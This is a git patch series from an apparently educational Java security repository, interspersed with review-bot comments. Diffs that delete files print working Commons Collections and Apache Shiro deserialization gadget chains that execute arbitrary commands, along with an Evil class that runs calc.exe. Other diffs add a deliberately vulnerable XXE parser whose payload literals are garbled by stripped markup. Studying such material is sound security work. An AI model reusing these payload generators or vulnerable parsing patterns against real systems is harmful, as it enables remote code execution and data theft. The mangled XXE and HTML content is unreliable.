-import java.io.ByteArrayOutputStream;
-import java.io.ObjectOutputStream;
-import java.lang.reflect.Field;
-import java.util.HashMap;
-import java.util.Map;
-
-
-public class CommonsCollections6 {
- public byte[] getPayload(String command) throws Exception {
- Transformer[] fakeTransformers = new Transformer[] {new ConstantTransformer(1)};
- Transformer[] transformers = new Transformer[] {
- new ConstantTransformer(Runtime.class),
- new InvokerTransformer("getMethod", new Class[] { String.class,
- Class[].class }, new Object[] { "getRuntime",
- new Class[0] }),
- new InvokerTransformer("invoke", new Class[] { Object.class,
- Object[].class }, new Object[] { null, new Object[0] }),
- new InvokerTransformer("exec", new Class[] { String.class },
- new String[] { command }),
- new ConstantTransformer(1),
- };
- Transformer transformerChain = new ChainedTransformer(fakeTransformers);
-
- // 不再使用原CommonsCollections6中的HashSet,直接使用HashMap
- Map innerMap = new HashMap();
- Map outerMap = LazyMap.decorate(innerMap, transformerChain);
-
- TiedMapEntry tme = new TiedMapEntry(outerMap, "keykey");
-
- Map expMap = new HashMap();
- expMap.put(tme, "valuevalue");
-
- outerMap.remove("keykey");
-
- Field f = ChainedTransformer.class.getDeclaredField("iTransformers");
- f.setAccessible(true);
- f.set(transformerChain, transformers);
-
- ByteArrayOutputStream barr = new ByteArrayOutputStream();
- ObjectOutputStream oos = new ObjectOutputStream(barr);
- oos.writeObject(expMap);
- oos.close();
-
- return barr.toByteArray();
- }
-}
diff --git a/shiro/shiroattack/src/main/java/com/govuln/shiroattack/CommonsCollectionsShiro.java b/shiro/shiroattack/src/main/java/com/govuln/shiroattack/CommonsCollectionsShiro.java
deleted file mode 100644
index cb0e46a..0000000
--- a/shiro/shiroattack/src/main/java/com/govuln/shiroattack/CommonsCollectionsShiro.java
+++ /dev/null
@@ -1,51 +0,0 @@
-package com.govuln.shiroattack;
-
-import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
-import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
-import org.apache.commons.collections.Transformer;
-import org.apache.commons.collections.functors.InvokerTransformer;
-import org.apache.commons.collections.keyvalue.TiedMapEntry;
-import org.apache.commons.collections.map.LazyMap;
-
-import java.io.ByteArrayOutputStream;
-import java.io.ObjectOutputStream;
-import java.lang.reflect.Field;
-import java.util.HashMap;
-import java.util.Map;
-
-public class CommonsCollectionsShiro {
- public static void setFieldValue(Object obj, String fieldName, Object value) throws Exception {
- Field field = obj.getClass().getDeclaredField(fieldName);
- field.setAccessible(true);
- field.set(obj, value);
- }
-
- public byte[] getPayload(byte[] clazzBytes) throws Exception {
- TemplatesImpl obj = new TemplatesImpl();
- setFieldValue(obj, "_bytecodes", new byte[][]{clazzBytes});
- setFieldValue(obj, "_name", "HelloTemplatesImpl");
- setFieldValue(obj, "_tfactory", new TransformerFactoryImpl());
-
- Transformer transformer = new InvokerTransformer("getClass", null, null);
-
- Map innerMap = new HashMap();
- Map outerMap = LazyMap.decorate(innerMap, transformer);
-
- TiedMapEntry tme = new TiedMapEntry(outerMap, obj);
-
- Map expMap = new HashMap();
- expMap.put(tme, "valuevalue");
-
- outerMap.clear();
- setFieldValue(transformer, "iMethodName", "newTransformer");
-
- // ==================
- // 生成序列化字符串
- ByteArrayOutputStream barr = new ByteArrayOutputStream();
- ObjectOutputStream oos = new ObjectOutputStream(barr);
- oos.writeObject(expMap);
- oos.close();
-
- return barr.toByteArray();
- }
-}
\ No newline at end of file
diff --git a/shiro/shiroattack/src/main/java/com/govuln/shiroattack/Evil.java b/shiro/shiroattack/src/main/java/com/govuln/shiroattack/Evil.java
deleted file mode 100644
index 0336572..0000000
--- a/shiro/shiroattack/src/main/java/com/govuln/shiroattack/Evil.java
+++ /dev/null
@@ -1,19 +0,0 @@
-package com.govuln.shiroattack;
-
-import com.sun.org.apache.xalan.internal.xsltc.DOM;
-import com.sun.org.apache.xalan.internal.xsltc.TransletException;
-import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
-import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
-import com.sun.org.apache.xml.internal.serializer.SerializationHandler;
-
-public class Evil extends AbstractTranslet {
- public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {}
-
- public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {}
-
- public Evil() throws Exception {
- super();
- System.out.println("Hello TemplatesImpl");
- Runtime.getRuntime().exec("calc.exe");
- }
-}
\ No newline at end of file
diff --git "a/\350\241\250\350\276\276\345\274\217+SSTI/Thymeleaf/src/main/resources/templates/payload.html" "b/\350\241\250\350\276\276\345\274\217+SSTI/Thymeleaf/src/main/resources/templates/payload.html"
new file mode 100644
index 0000000..4bdcfcb
--- /dev/null
+++ "b/\350\241\250\350\276\276\345\274\217+SSTI/Thymeleaf/src/main/resources/templates/payload.html"
@@ -0,0 +1,10 @@
+ + + + $Title$ + + +$END$ + +
\ No newline at end of file
From 1a57502fef90441f4328498e4315bba48c9ec479 Mon Sep 17 00:00:00 2001
From: 1diot9 <2868944833@qq.com> Date: Mon, 10 Nov 2025 16:56:12 +0800 Subject: [PATCH 12/16] update: JNDI --- .../SSRF/.gitignore" | 38 ++++ .../SSRF/.idea/.gitignore" | 8 + .../SSRF/.idea/encodings.xml" | 7 + .../SSRF/.idea/misc.xml" | 14 ++ .../SSRF/.idea/vcs.xml" | 4 + .../SSRF/pom.xml" | 21 ++ .../SSRF/src/main/resources/springmvc.xml" | 6 + .../SSRF/src/main/webapp/WEB-INF/web.xml" | 7 + .../SSRF/src/main/webapp/index.jsp" | 5 + .../SSRF/src/main/webapp/ssrf/ssrfTest1.jsp" | 16 ++ .../SSRF/src/main/webapp/ssrf/ssrfTest2.jsp" | 16 ++ .../SSRF/src/main/webapp/ssrf/ssrfTest3.jsp" | 16 ++ .../XXE/1.dtd" | 0 .../XXE/2.dtd" | 0 .../XXE/dns.xml" | 0 .../XXE/dnsoob.dtd" | 0 .../XXE/dnsoob.xml" | 0 .../XXE/oob.dtd" | 0 .../XXE/oob.xml" | 0 .../main/java/com/test/local/XXEVuln.java" | 127 ++++++++++++ .../Ser_Dser/src/main/java/deser/Main.java" | 0 .../Ser_Dser/src/main/java/pojo/Baka.java" | 62 ++++++ .../Ser_Dser/src/main/java/pojo/Student.java" | 4 + .../Ser_Dser/src/main/java/ser/Ser01.java" | 4 + README.md | 193 +++++++++++++++--- shiro/.idea/shiro.iml | 16 ++ shiro/python/.idea/python.iml | 8 + shiro/shiroDeser/BadInterceptor_within.class | Bin 0 -> 11812 bytes shiro/shiroDeser/Calc.class | Bin 0 -> 742 bytes shiro/shiroDeser/SimpleInterceptor.class | Bin 0 -> 4750 bytes shiro/shiroDeser/SpringEcho.class | Bin 0 -> 3645 bytes shiro/shiroDeser/loadClass.class | Bin 0 -> 2848 bytes shiro/shiroDeser/python/fileWrite.py | 19 ++ .../src/main/java/com/exp/ClassByteGen.java | 4 + shiro/shiroDeser/src/main/java/com/exp/L.java | 4 + .../src/main/java/com/exp/WriteFile.java | 4 + .../src/main/java/com/exp/WriteProperty.java | 4 + .../shiroDeser/src/main/java/com/exp/tmp.java | 4 + 38 files changed, 577 insertions(+), 34 deletions(-) create mode 100644 "JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/SSRF/.gitignore" create mode 100644 "JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/SSRF/.idea/.gitignore" create mode 100644 
"JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/SSRF/.idea/encodings.xml" create mode 100644 "JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/SSRF/.idea/misc.xml" create mode 100644 "JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/SSRF/.idea/vcs.xml" create mode 100644 "JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/SSRF/pom.xml" create mode 100644 "JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/SSRF/src/main/resources/springmvc.xml" create mode 100644 "JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/SSRF/src/main/webapp/WEB-INF/web.xml" create mode 100644 "JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/SSRF/src/main/webapp/index.jsp" create mode 100644 "JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/SSRF/src/main/webapp/ssrf/ssrfTest1.jsp" create mode 100644 "JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/SSRF/src/main/webapp/ssrf/ssrfTest2.jsp" create mode 100644 "JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/SSRF/src/main/webapp/ssrf/ssrfTest3.jsp" create mode 100644 "JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/XXE/1.dtd" create mode 100644 "JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/XXE/2.dtd" create mode 100644 "JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/XXE/dns.xml" create mode 100644 "JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/XXE/dnsoob.dtd" create mode 100644 "JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/XXE/dnsoob.xml" create mode 100644 "JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/XXE/oob.dtd" create mode 100644 "JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/XXE/oob.xml" create mode 100644 "JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/XXE/src/main/java/com/test/local/XXEVuln.java" rename 
"Java\345\237\272\347\241\200/\345\216\237\347\224\237\345\272\217\345\210\227\345\214\226\345\222\214\345\217\215\345\272\217\345\210\227\345\214\226\346\265\201\347\250\213/Ser_Dser/src/main/java/dser/Main.java" => "Java\345\237\272\347\241\200/\345\216\237\347\224\237\345\272\217\345\210\227\345\214\226\345\222\214\345\217\215\345\272\217\345\210\227\345\214\226\346\265\201\347\250\213/Ser_Dser/src/main/java/deser/Main.java" (100%) create mode 100644 "Java\345\237\272\347\241\200/\345\216\237\347\224\237\345\272\217\345\210\227\345\214\226\345\222\214\345\217\215\345\272\217\345\210\227\345\214\226\346\265\201\347\250\213/Ser_Dser/src/main/java/pojo/Baka.java" create mode 100644 "Java\345\237\272\347\241\200/\345\216\237\347\224\237\345\272\217\345\210\227\345\214\226\345\222\214\345\217\215\345\272\217\345\210\227\345\214\226\346\265\201\347\250\213/Ser_Dser/src/main/java/pojo/Student.java" create mode 100644 "Java\345\237\272\347\241\200/\345\216\237\347\224\237\345\272\217\345\210\227\345\214\226\345\222\214\345\217\215\345\272\217\345\210\227\345\214\226\346\265\201\347\250\213/Ser_Dser/src/main/java/ser/Ser01.java" create mode 100644 shiro/.idea/shiro.iml create mode 100644 shiro/python/.idea/python.iml create mode 100644 shiro/shiroDeser/BadInterceptor_within.class create mode 100644 shiro/shiroDeser/Calc.class create mode 100644 shiro/shiroDeser/SimpleInterceptor.class create mode 100644 shiro/shiroDeser/SpringEcho.class create mode 100644 shiro/shiroDeser/loadClass.class create mode 100644 shiro/shiroDeser/python/fileWrite.py create mode 100644 shiro/shiroDeser/src/main/java/com/exp/ClassByteGen.java create mode 100644 shiro/shiroDeser/src/main/java/com/exp/L.java create mode 100644 shiro/shiroDeser/src/main/java/com/exp/WriteFile.java create mode 100644 shiro/shiroDeser/src/main/java/com/exp/WriteProperty.java create mode 100644 shiro/shiroDeser/src/main/java/com/exp/tmp.java 
diff --git "a/JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/SSRF/.gitignore" "b/JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/SSRF/.gitignore" new file mode 100644 index 0000000..5ff6309 --- /dev/null +++ "b/JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/SSRF/.gitignore" @@ -0,0 +1,38 @@ +target/ +!.mvn/wrapper/maven-wrapper.jar +!**/src/main/**/target/ +!**/src/test/**/target/ + +### IntelliJ IDEA ### +.idea/modules.xml +.idea/jarRepositories.xml +.idea/compiler.xml +.idea/libraries/ +*.iws +*.iml +*.ipr + +### Eclipse ### +.apt_generated +.classpath +.factorypath +.project +.settings +.springBeans +.sts4-cache + +### NetBeans ### +/nbproject/private/ +/nbbuild/ +/dist/ +/nbdist/ +/.nb-gradle/ +build/ +!**/src/main/**/build/ +!**/src/test/**/build/ + +### VS Code ### +.vscode/ + +### Mac OS ### +.DS_Store \ No newline at end of file diff --git "a/JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/SSRF/.idea/.gitignore" "b/JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/SSRF/.idea/.gitignore" new file mode 100644 index 0000000..35410ca --- /dev/null +++ "b/JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/SSRF/.idea/.gitignore" @@ -0,0 +1,8 @@ +# 默认忽略的文件 +/shelf/ +/workspace.xml +# 基于编辑器的 HTTP 客户端请求 +/httpRequests/ +# Datasource local storage ignored files +/dataSources/ +/dataSources.local.xml diff --git "a/JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/SSRF/.idea/encodings.xml" "b/JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/SSRF/.idea/encodings.xml" new file mode 100644 index 0000000..aa00ffa --- /dev/null +++ "b/JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/SSRF/.idea/encodings.xml" @@ -0,0 +1,7 @@ + + + + + + + \ No newline at end of file diff --git "a/JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/SSRF/.idea/misc.xml" "b/JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/SSRF/.idea/misc.xml" new file mode 100644 index 0000000..8345e46 
--- /dev/null +++ "b/JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/SSRF/.idea/misc.xml" @@ -0,0 +1,14 @@ + + + + + + + + + + \ No newline at end of file diff --git "a/JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/SSRF/.idea/vcs.xml" "b/JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/SSRF/.idea/vcs.xml" new file mode 100644 index 0000000..d843f34 --- /dev/null +++ "b/JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/SSRF/.idea/vcs.xml" @@ -0,0 +1,4 @@ + + + + \ No newline at end of file diff --git "a/JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/SSRF/pom.xml" "b/JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/SSRF/pom.xml" new file mode 100644 index 0000000..84992b0 --- /dev/null +++ "b/JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/SSRF/pom.xml" @@ -0,0 +1,21 @@ + + 4.0.0 + com.test + SSRF + war + 1.0-SNAPSHOT + SSRF Maven Webapp + http://maven.apache.org + + + junit + junit + 3.8.1 + test + + + + SSRF + + diff --git "a/JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/SSRF/src/main/resources/springmvc.xml" "b/JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/SSRF/src/main/resources/springmvc.xml" new file mode 100644 index 0000000..142def2 --- /dev/null +++ "b/JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/SSRF/src/main/resources/springmvc.xml" @@ -0,0 +1,6 @@ + + + + \ No newline at end of file diff --git "a/JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/SSRF/src/main/webapp/WEB-INF/web.xml" "b/JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/SSRF/src/main/webapp/WEB-INF/web.xml" new file mode 100644 index 0000000..9f88c1f --- /dev/null +++ "b/JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/SSRF/src/main/webapp/WEB-INF/web.xml" @@ -0,0 +1,7 @@ + + + + Archetype Created Web Application + 
diff --git "a/JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/SSRF/src/main/webapp/index.jsp" "b/JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/SSRF/src/main/webapp/index.jsp" new file mode 100644 index 0000000..c38169b --- /dev/null +++ "b/JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/SSRF/src/main/webapp/index.jsp" @@ -0,0 +1,5 @@ + + +

Hello World!

+ + diff --git "a/JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/SSRF/src/main/webapp/ssrf/ssrfTest1.jsp" "b/JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/SSRF/src/main/webapp/ssrf/ssrfTest1.jsp" new file mode 100644 index 0000000..513ef52 --- /dev/null +++ "b/JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/SSRF/src/main/webapp/ssrf/ssrfTest1.jsp" @@ -0,0 +1,16 @@ +<%-- + Created by IntelliJ IDEA. + User: snowstorm-maxy + Date: 2025/10/28 + Time: 10:30 + To change this template use File | Settings | File Templates. +--%> +<%@ page contentType="text/html;charset=UTF-8" language="java" %> + + + $Title$ + + + $END$ + + diff --git "a/JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/SSRF/src/main/webapp/ssrf/ssrfTest2.jsp" "b/JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/SSRF/src/main/webapp/ssrf/ssrfTest2.jsp" new file mode 100644 index 0000000..148ba39 --- /dev/null +++ "b/JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/SSRF/src/main/webapp/ssrf/ssrfTest2.jsp" @@ -0,0 +1,16 @@ +<%-- + Created by IntelliJ IDEA. + User: snowstorm-maxy + Date: 2025/10/28 + Time: 10:37 + To change this template use File | Settings | File Templates. +--%> +<%@ page contentType="text/html;charset=UTF-8" language="java" %> + + + $Title$ + + + $END$ + + diff --git "a/JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/SSRF/src/main/webapp/ssrf/ssrfTest3.jsp" "b/JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/SSRF/src/main/webapp/ssrf/ssrfTest3.jsp" new file mode 100644 index 0000000..bf9ba3a --- /dev/null +++ "b/JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/SSRF/src/main/webapp/ssrf/ssrfTest3.jsp" @@ -0,0 +1,16 @@ +<%-- + Created by IntelliJ IDEA. + User: snowstorm-maxy + Date: 2025/10/28 + Time: 10:38 + To change this template use File | Settings | File Templates. +--%> +<%@ page contentType="text/html;charset=UTF-8" language="java" %> + + + $Title$ + + + $END$ + + 
diff --git "a/JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/XXE/1.dtd" "b/JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/XXE/1.dtd" new file mode 100644 index 0000000..e69de29 diff --git "a/JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/XXE/2.dtd" "b/JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/XXE/2.dtd" new file mode 100644 index 0000000..e69de29 diff --git "a/JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/XXE/dns.xml" "b/JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/XXE/dns.xml" new file mode 100644 index 0000000..e69de29 diff --git "a/JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/XXE/dnsoob.dtd" "b/JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/XXE/dnsoob.dtd" new file mode 100644 index 0000000..e69de29 diff --git "a/JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/XXE/dnsoob.xml" "b/JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/XXE/dnsoob.xml" new file mode 100644 index 0000000..e69de29 diff --git "a/JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/XXE/oob.dtd" "b/JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/XXE/oob.dtd" new file mode 100644 index 0000000..e69de29 diff --git "a/JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/XXE/oob.xml" "b/JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/XXE/oob.xml" new file mode 100644 index 0000000..e69de29 diff --git "a/JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/XXE/src/main/java/com/test/local/XXEVuln.java" "b/JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/XXE/src/main/java/com/test/local/XXEVuln.java" new file mode 100644 index 0000000..40a5cec --- /dev/null +++ "b/JavaWeb\345\270\270\350\247\201\346\274\217\346\264\236/XXE/src/main/java/com/test/local/XXEVuln.java" 
@@ -0,0 +1,127 @@ +package com.test.local; + +import org.apache.commons.digester3.Digester; +import org.dom4j.DocumentException; +import org.dom4j.io.SAXReader; +import org.jdom2.JDOMException; +import org.jdom2.input.SAXBuilder; +import org.w3c.dom.Document; +import org.w3c.dom.Node; +import org.w3c.dom.NodeList; +import org.xml.sax.InputSource; +import org.xml.sax.SAXException; +import org.xml.sax.XMLReader; +import org.xml.sax.helpers.DefaultHandler; +import org.xml.sax.helpers.XMLReaderFactory; + +import javax.xml.parsers.*; +import java.io.IOException; +import java.io.InputStream; +import java.io.StringReader; + +public class DocBuilder { + public static void main(String[] args) throws ParserConfigurationException, IOException, SAXException { + String xml1 = "" + + "]>" + + "" + + "&xxe;" + + "webgoat" + + ""; + + // 报错抛出数据 + String xml2 = "\n" + + "\n" + + "\n" + + "%remote;%int;%send;\n" + + "]>"; + + //DNS探测 + String xml3 = "\n" + + "\n" + + "\n" + + "%remote;\n" + + "]>"; + + // 通过CDATA,读取包含特殊符号的文本 + String xml4 = " \n" + + " \n" + + " \n" + + "\"> \n" + + " \n" + + "%dtd; ]> \n" + + "\n" + + "&all;"; + + docBuilder(xml4); + } + + public static void docBuilder(String xml) throws ParserConfigurationException, IOException, SAXException { + InputStream inputStream = new java.io.ByteArrayInputStream(xml.getBytes()); + + DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance(); + DocumentBuilder builder = factory.newDocumentBuilder(); + + // 漏洞:未禁用外部实体 + Document doc = builder.parse(inputStream); + + // 遍历xml节点name和value + StringBuffer buf = new StringBuffer(); + NodeList rootNodeList = doc.getChildNodes(); + for (int i = 0; i < rootNodeList.getLength(); i++) { + Node rootNode = rootNodeList.item(i); + NodeList child = rootNode.getChildNodes(); + for (int j = 0; j < child.getLength(); j++) { + Node node = child.item(j); + buf.append(node.getNodeName() + ": " + node.getTextContent() + "\n"); + } + } + System.out.println(buf.toString()); +// 
System.out.println(doc); + System.out.println("Document parsed successfully"); + } + + public static void xmlReader(String xml) throws ParserConfigurationException, IOException, SAXException { + XMLReader xmlReader = XMLReaderFactory.createXMLReader(); + xmlReader.parse(new InputSource(new StringReader(xml))); + } + + public static void SAXBuilder(String xml) throws ParserConfigurationException, IOException, SAXException, JDOMException { + SAXBuilder builder = new SAXBuilder(); + // org.jdom2.Document document + builder.build(new InputSource(new StringReader(xml))); // cause xxe + } + + public static void SAXReader(String xml) throws DocumentException { + SAXReader reader = new SAXReader(); + // org.dom4j.Document document + reader.read(new InputSource(new StringReader(xml))); // cause xxe + } + + public static void SAXParser(String xml) throws ParserConfigurationException, SAXException, IOException { + SAXParserFactory spf = SAXParserFactory.newInstance(); + SAXParser parser = spf.newSAXParser(); + parser.parse(new InputSource(new StringReader(xml)), new DefaultHandler()); + } + + public static void Digester(String xml) throws IOException, SAXException { + Digester digester = new Digester(); + Object parse = digester.parse(new StringReader(xml));// parse xml + } + + public static void docBuilderXinclude(String xml) throws ParserConfigurationException, IOException, SAXException { + DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance(); + dbf.setXIncludeAware(true); // 支持XInclude + dbf.setNamespaceAware(true); // 支持XInclude + DocumentBuilder db = dbf.newDocumentBuilder(); + StringReader sr = new StringReader(xml); + InputSource is = new InputSource(sr); + Document document = db.parse(is); // parse xml + + NodeList rootNodeList = document.getChildNodes(); + } + + +} 
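Review bot: The file is added as `XXEVuln.java` but declares `public class DocBuilder`, so javac rejects it outright (a public top-level class must match its file name); rename the class to `public class XXEVuln {` or rename the file. The parser helpers `docBuilder`, `xmlReader`, `SAXBuilder`, `SAXReader`, `SAXParser`, `Digester` and `docBuilderXinclude` all build a default factory, yet only `docBuilder` says so in a comment; since this is a deliberately vulnerable sample, each helper should carry a one-line `// deliberately vulnerable: default config resolves external entities` note and the hardened counterpart a reader should compare against, e.g. `factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);` placed before `newDocumentBuilder()` (the same feature URI applies to the SAX/dom4j/jdom2 readers). `xml.getBytes()` in `docBuilder` uses the platform default charset, which can silently alter a non-ASCII payload; use `xml.getBytes(StandardCharsets.UTF_8)` (needs `java.nio.charset.StandardCharsets`). As rendered here the `xml1`–`xml4` literals contain only fragments such as `"]>"` and `"&xxe;"` with no visible `<!DOCTYPE`/`<!ENTITY` declarations; if that is how the file actually reads rather than a rendering artefact, none of the samples will trigger entity resolution.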
diff --git "a/Java\345\237\272\347\241\200/\345\216\237\347\224\237\345\272\217\345\210\227\345\214\226\345\222\214\345\217\215\345\272\217\345\210\227\345\214\226\346\265\201\347\250\213/Ser_Dser/src/main/java/dser/Main.java" "b/Java\345\237\272\347\241\200/\345\216\237\347\224\237\345\272\217\345\210\227\345\214\226\345\222\214\345\217\215\345\272\217\345\210\227\345\214\226\346\265\201\347\250\213/Ser_Dser/src/main/java/deser/Main.java" similarity index 100% rename from "Java\345\237\272\347\241\200/\345\216\237\347\224\237\345\272\217\345\210\227\345\214\226\345\222\214\345\217\215\345\272\217\345\210\227\345\214\226\346\265\201\347\250\213/Ser_Dser/src/main/java/dser/Main.java" rename to "Java\345\237\272\347\241\200/\345\216\237\347\224\237\345\272\217\345\210\227\345\214\226\345\222\214\345\217\215\345\272\217\345\210\227\345\214\226\346\265\201\347\250\213/Ser_Dser/src/main/java/deser/Main.java" diff --git "a/Java\345\237\272\347\241\200/\345\216\237\347\224\237\345\272\217\345\210\227\345\214\226\345\222\214\345\217\215\345\272\217\345\210\227\345\214\226\346\265\201\347\250\213/Ser_Dser/src/main/java/pojo/Baka.java" "b/Java\345\237\272\347\241\200/\345\216\237\347\224\237\345\272\217\345\210\227\345\214\226\345\222\214\345\217\215\345\272\217\345\210\227\345\214\226\346\265\201\347\250\213/Ser_Dser/src/main/java/pojo/Baka.java" new file mode 100644 index 0000000..63aed70 --- /dev/null +++ "b/Java\345\237\272\347\241\200/\345\216\237\347\224\237\345\272\217\345\210\227\345\214\226\345\222\214\345\217\215\345\272\217\345\210\227\345\214\226\346\265\201\347\250\213/Ser_Dser/src/main/java/pojo/Baka.java" 
@@ -0,0 +1,62 @@
+package com.test.pojo;
+
+public class Baka extends Object{
+ public String name;
+ protected int gender;
+ private int age;
+
+ public Baka() {
+ System.out.println("Baka⑨");
+ }
+
+ public Baka(String name, int gender, int age) {
+ this.name = name;
+ this.gender = gender;
+ this.age = age;
+ System.out.println(name + " " + gender + " " + age);
+ }
+
+ public static void sit(String name) {
+ System.out.println("sit " + name);
+ }
+
+ public void hello(String name) {
+ System.out.println("hello " + name);
+ }
+
+ protected void hug(String name) {
+ System.out.println("hug " + name);
+ }
+
+ private void kiss(String name) {
+ System.out.println("kiss " + name);
+ }
+
+ private void kiss(String alias, String name) {
+ System.out.println("kiss " + alias + "(" + name + ")");
+ }
+
+ public String getName() {
+ return name;
+ }
+
+ public void setName(String name) {
+ this.name = name;
+ }
+
+ public int getGender() {
+ return gender;
+ }
+
+ public void setGender(int gender) {
+ this.gender = gender;
+ }
+
+ public int getAge() {
+ return age;
+ }
+
+ public void setAge(int age) {
+ this.age = age;
+ }
+}
diff --git "a/Java\345\237\272\347\241\200/\345\216\237\347\224\237\345\272\217\345\210\227\345\214\226\345\222\214\345\217\215\345\272\217\345\210\227\345\214\226\346\265\201\347\250\213/Ser_Dser/src/main/java/pojo/Student.java" "b/Java\345\237\272\347\241\200/\345\216\237\347\224\237\345\272\217\345\210\227\345\214\226\345\222\214\345\217\215\345\272\217\345\210\227\345\214\226\346\265\201\347\250\213/Ser_Dser/src/main/java/pojo/Student.java"
new file mode 100644
index 0000000..e8df6ba
--- /dev/null
+++ "b/Java\345\237\272\347\241\200/\345\216\237\347\224\237\345\272\217\345\210\227\345\214\226\345\222\214\345\217\215\345\272\217\345\210\227\345\214\226\346\265\201\347\250\213/Ser_Dser/src/main/java/pojo/Student.java"
@@ -0,0 +1,4 @@
+package pojo;
+
+public class Student {
+}
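Review bot: `Baka.java` lands under `src/main/java/pojo/` but declares `package com.test.pojo;`, while `Student.java` in the same hunk declares `package pojo;`; the mismatch looks like a leftover from the ClassLoadStudy copy of this class and will trip the IDE and any `Class.forName("pojo.Baka")` lookup the reflection/deserialization demos in this module perform — change it to `package pojo;`. The module is named Ser_Dser, yet `Baka` does not implement `java.io.Serializable`, so if it is meant to be the object handed to `ObjectOutputStream.writeObject` that call will throw `NotSerializableException`; add `implements java.io.Serializable` in that case and, as a security-corpus reminder, a comment that any `readObject`/`readResolve` hook added later runs on attacker-controlled input during deserialization. `extends Object` is redundant and can be dropped. The mix of public/protected/private fields and the overloaded private `kiss` methods appears intentional for reflection exercises; a class-level comment saying so, e.g. `// Fixture with every access level so reflection demos can exercise getDeclaredField/getDeclaredMethod`, would save the next reader a guess.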
